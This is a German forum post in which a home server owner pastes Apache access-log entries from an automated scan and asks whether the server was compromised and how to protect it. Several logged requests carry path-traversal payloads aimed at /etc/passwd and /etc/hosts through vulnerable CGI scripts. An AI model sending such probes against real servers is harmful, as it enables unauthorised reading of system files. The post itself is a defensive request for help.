W2K SRV + Apache 2.0.xxxxx

[BlackShadow 12]

Hi,

 

hab en Server zu hause ( der wie immer )

2000 Server druff mit Dynip zeugs.

drauf läuft ein Apache + Mysql und so.

 

hattet ihr so was schon mal?

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:24 +0200] "HEAD /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 -

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:24 +0200] "HEAD /Admin_files/ HTTP/1.0" 404 -

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:24 +0200] "GET ///quote.html HTTP/1.0" 404 1099

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:24 +0200] "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 1099

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:25 +0200] "HEAD /cgi-bin/dcboard.cgi HTTP/1.0" 404 -

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:25 +0200] "GET /cgi-bin/nph-maillist.pl HTTP/1.0" 404 1099

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:25 +0200] "GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 404 1099

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:26 +0200] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0" 404 1099

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:26 +0200] "HEAD /cgi-bin/ikonboard/ HTTP/1.0" 404 -

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:26 +0200] "HEAD /foldoc/ HTTP/1.0" 404 -

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:26 +0200] "HEAD /cgi-bin/adcycle/ HTTP/1.0" 404 -

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:26 +0200] "GET /cgi-bin/store.cgi?StartID=../etc/passwd%00.html HTTP/1.0" 404 1099

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:27 +0200] "HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 -

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:27 +0200] "HEAD /cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html HTTP/1.0" 404 -

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:27 +0200] "GET /cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd HTTP/1.0" 404 1099

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:27 +0200] "GET /cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0" 404 1099

pd952b8da.dip.t-dialin.net - - [11/Aug/2003:21:46:28 +0200] "HEAD /cgi-bin/mailnews.cgi HTTP/1.0" 404 -

##################################

ok hoffe das is ned zu viel das stand auf jeden fall in der access.log! *g sieht mir aus wie ein hack angriff von einem Script Kiddi!

 

Was tun? alles endete ja in einem 404 dh. gibts ned!

 

kann es einem gelungen sein? das steht in dem Ereigniss Protokoll

Es wurde versucht, die geschützte Systemdatei c:\winnt\system32\scrrnde.dll zu ersetzen. Diese Datei wurde von der Originalversion wiederhergestellt, um die Systemstabilität beizubehalten. Die Dateiversion der Systemdatei ist 5.6.0.6626.

 

#

wie schaff ich es und was muss ich tun damit da nix passieren kann?

 

vielen dank für hilfe

 

gruß Frank